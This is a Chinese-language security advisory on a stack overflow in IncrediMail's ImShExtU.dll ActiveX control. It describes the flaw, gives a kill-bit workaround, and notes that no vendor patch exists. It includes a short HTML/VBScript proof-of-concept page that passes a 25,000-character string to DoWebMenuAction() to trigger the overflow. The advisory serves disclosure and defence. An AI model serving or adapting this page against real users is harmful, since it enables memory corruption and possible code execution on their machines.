发布日期：2009-05-14
更新日期：2010-05-18

受影响系统：

IncrediMail Ltd IncrediMail

描述：

---

IncrediMail是一款电子邮件客户端软件。

IncrediMail所安装的ImShExtU.dll ActiveX控件没有正确地过滤提交给DoWebMenuAction()函数的输入参数，用户受骗访问了恶意网页并向该方式提交了超长字符串就可以触发栈溢出，导致执行任意代码。

<*来源：Lincoln
  
  链接：http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-038-incredimail-imshextu-dll-activex/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>
<script language='vbscript'>


crash=String(25000, "A")
target.DoWebMenuAction crash


</script>
<b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>
</html>

建议：

---

临时解决方法：

* 为clsid F8984111-38B6-11D5-8725-0050DA2761C4设置kill bit。

厂商补丁：

IncrediMail Ltd
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.incredimail.com/english/index.asp

浏览次数：2789
严重程度：0（网友投票）